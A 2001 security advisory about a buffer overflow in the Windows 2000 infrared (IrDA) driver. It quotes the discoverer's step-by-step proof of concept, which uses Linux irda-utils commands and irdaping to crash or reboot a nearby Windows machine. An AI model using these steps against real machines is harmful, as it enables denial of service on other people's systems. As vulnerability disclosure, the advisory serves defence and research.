Reported August 21, 2001, by Microsoft.
· Windows 2000
An unchecked buffer exists in the Infrared Data Association (IrDA) driver that can cause a Denial of Service (DoS) condition. A system running Win2K with infrared support turned on can crash when it receives an IrDA test frame from a Linux system that is using the irdaping utility.
Paul Millar, who discovered the vulnerability, posted the following scenario as proof-of-concept:
1. Start up the laptops. My setup was: victim running Windows, protagonist running GNU/Linux. The Linux kernel must have IrDA support.
2. Under GNU/Linux, make sure irda-utils-0.9.10-9 is installed; other versions are untested, but will probably work too.
3. Do "irattach /dev/ttyS1 -s" or equivalent to activate the IrDA.
4. Check that the GNU/Linux side is working correctly by running the "irdadump" command. You should see repetitive output similar to:
07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [ Computer ] (28)
5. Place the laptops so the infrared ports are aligned and within IrDA distance; irdadump should reflect the new machine. The Windows machine should also respond, usually by making a sound.
6. Run irdaping. The destination address ("0x4d274896" for the above example) is required, but the actual value doesn't matter.
The vulnerable system at this point will either crash with a blue screen or will reboot, depending upon the system’s configuration.
Discovered by Paul Millar.